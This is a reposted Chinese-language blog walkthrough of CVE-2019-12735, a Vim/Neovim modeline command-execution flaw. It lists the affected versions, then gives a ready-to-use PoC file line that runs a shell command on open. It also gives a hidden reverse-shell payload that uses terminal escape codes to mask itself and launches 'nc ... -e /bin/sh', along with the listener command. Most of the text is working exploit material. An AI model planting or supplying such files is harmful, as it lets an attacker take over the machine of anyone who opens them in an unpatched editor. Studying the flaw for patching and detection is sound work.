碼上歡樂
相關內容    簡體    繁體

文本編輯器Vim/Neovim任意代碼執行漏洞(CVE-2019-12735)

本文轉載自   查看原文   2019-06-06 13:44   1300    CVE/ 滲透測試

受影響版本:

Vim < 8.1.1365, Neovim < 0.3.6

前提:開啟modeline

 

0x01 開啟modeline

在你的home下的.vimrc文件中增加一行:

set modeline

 

0x02 Poc

創建文件poc.txt,內容為

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

輸入命令 $vim poc.txt

系統將會執行uname -a

 

0x03 反彈shell

創建shell.txt,內容如下

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

開啟兩個終端:

一個輸入命令 $nc -lvvp 9999

另一個命令為 $vim shell.txt

成功反彈shell

 

參考鏈接:

https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 CVE-2019-12735 VIM命令執行漏洞利用 Linux系統下好用的文本編輯器—NeoVim 文本編輯器vim和gedit 富文本編輯器代碼 文本編輯器vim/vi——末行模式 Linux文本編輯器-vi/vim 如何用 vim 文本編輯器比較兩文件 Vim-一款好用的文本編輯器 Vim文本編輯器和編寫shell命令腳本 Vim文本編輯器的下載與使用
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM